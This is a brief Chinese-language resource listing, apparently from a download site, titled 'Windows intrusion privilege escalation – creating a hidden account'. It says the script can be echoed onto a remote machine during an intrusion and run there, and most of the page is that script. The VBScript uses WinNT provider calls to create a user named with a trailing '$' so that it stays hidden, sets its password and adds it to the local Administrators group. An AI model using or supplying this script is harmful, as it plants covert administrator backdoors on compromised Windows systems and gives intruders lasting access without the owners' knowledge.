-
在Windows系统中进行入侵提权时,创建一个隐藏账户
资源介绍
windows入侵提权-创建隐藏帐号
使用vbs的好处是可以通过echo 输入到远程计算机中,然后运行.(具体提权过程请参照本人相关的文章).
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","xxxx$")
od.SetPassword "yyyy"
od.SetInfo
Set of=GetObject(os&"/xxxx$",user)
oe.add os&"/xxxx$"